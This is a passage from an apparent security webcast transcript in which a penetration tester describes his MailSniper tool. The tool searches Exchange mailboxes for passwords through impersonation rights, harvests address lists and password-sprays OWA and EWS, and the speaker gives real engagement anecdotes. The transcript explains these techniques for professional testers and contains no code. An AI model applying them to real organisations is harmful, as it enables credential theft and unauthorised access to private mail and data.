in most organizations, the primary mechanism for communication. A lot of organizations, have just random chit-chat about daily business, or you might have actual insider business intel in email. And a lot of times you have like people that are sending password resets. So I started to look at email as a potential vector for finding sensitive data. So I wrote a tool called Mail Sniper. I released it at DerbyCon a couple weeks ago. And this tool essentially will allow you to search through every user's email on a network for sensitive data. I wrote it in PowerShell so that it'd be easy to run on a Windows network, because most of the organizations, again, we go up against have Exchange and our Microsoft Windows environment. So with Mail Sniper, we have a couple abilities. Number one, we have the ability to search all mailboxes as an admin, or just search your current user's mailbox as a non-admin. And with the ability of searching just your own mailbox, a lot of people are like, well, what good is that, just to be able to search your own email? If you go back to that password spread, we got access to a lot of creds then. Let's say that with Bloodhound, we didn't find a way to domain admin, but we had all those creds. Now that you have all these different users' credentials, you can then search through each one of their emails for more passwords and find additional access to other systems via just email. So again, you can run it from any workstation on a domain. It's on GitHub if you want to check it out. I'm going to talk about it a little bit more here. So Invoke Self-Search is one of the modules that, this is the module that will allow you to just search your own current user's mailbox. And again, it could be a nice privilege escalation tool to just look through their own email for passwords. This specific module actually works remotely too. So if you have a remote server, so like let's say you have like an OS server set up, if they haven't actually disabled Exchange Web Services on that server, you can actually connect to it over the internet as well and search their mails. Invoke-Global Search, or Global Mail Search, is the larger overarching mail search that will actually search all the mailboxes on a domain. So what it does is essentially, as an Exchange admin, you run Mail Sniper. It will connect to Exchange with PS Remoting and grant a user of your choice the application impersonation role. Now, the reason I have to do that is because domain admins, by default, actually doesn't have access to look through everybody's email. So you have to actually grant a user that you want to be able to look through everyone's email the application impersonation role. So you grant that user the impersonation role, gather all the mailboxes from the domain, and then search for specific terms. By default, it looks for password, creds, and credentials. But you can specify any terms you want. So some examples from some of the tests that we've run. So these are real examples from real organizations. This specific search was a global mail search with the term database. Now, I was just looking for a customer database, but what I found was actually a little bit more interesting. In this email, you can see the subject is exported to KeyPass. Something was exported to KeyPass. I redacted that, but basically, you see where he wrote software location and then database and key location. And I was like, database and key location for something regarding KeyPass. So I went to that location. Sure enough, there was a KeyPass database as well as a KeyPass key file in the directory that he pointed out in this email. And I downloaded it, opened it up with KeyPass, and sure enough, it was only single factor. It only required the key that was in the same folder as the KeyPass database. No other credential, no two-factor or anything. Logged into the KeyPass database, and it had everything. As you can see here on this screenshot, we had Windows, which was pretty much all of their domain passwords, all the local admin passwords for every server, and all the network device passwords, so all their routers, switches, their databases, all the SA passwords for all the databases, all their security products. Yeah, it was a nice find, but again, found it through just searching email very quickly. And then we have Invoke Global Mail Search with just the default terms. This was one that was kind of fun. Basically found where an email was being sent with the meeting number and a password to call into a WebEx meeting. So, you can imagine, like, as a pen tester calling in and listening in on a call would be kind of interesting during a pen test. It'd be fun to shout out things, maybe, just at random, or not. And then this is one Brian found on a test he was on. He basically found where an organization was telling somebody that their password had been reset recently, and that password was being traversed to other databases on the network that I had access to. So specifically, it was telling the user that they had access to this Oracle database and a Sybase database and where it was. So Brian, looking through these emails, he basically logged into the database as the guy that he had the credential of, and sure enough, it was like production database and had access to all the customer data, which was such a win. So there's a couple other Mail Sniper modules I'll talk about real quickly because I know we only have a minute or so left. So one is the get-global address list, which basically, this is a remote attack. So if you're an organization who has an OA server set up, if I get access to one credential to log into OA, I can grab all the email addresses from OA via the global address list. So this is a function built into Mail Sniper. Another one that we installed, or that I wrote into Mail Sniper, are two different modules for password spraying. One for password spraying OA and the other for EWS. Again, password spraying is such a common way for us to gain access to credentials remotely, so it's definitely worth trying out in your organization. It's available on GitHub. If you want to go grab it, github.com/dattack/mailsniper. You can email me if you have any questions about it. But that is it. Sierra, if you have any questions, I know we are out of time.
We had so many questions, you guys, and I'm sorry we didn't get to them, but we have more information about the Mail Sniper program and the additions that Beau just made on our blog at blackhillsinfosec.com. And you can also tweet your questions to Brian or Beau or to us, our Twitter, BHInfoSecurity. And I'm sorry we didn't get to all those, but you guys asked really good ones, and we will try and follow up with everybody. So thanks for coming, and thank you to Brian and Beau for doing this webcast.
Thank you, Sierra.
Yep.
All right, have a great day, guys.
Thanks, everyone. See ya.
Bye.
Bye.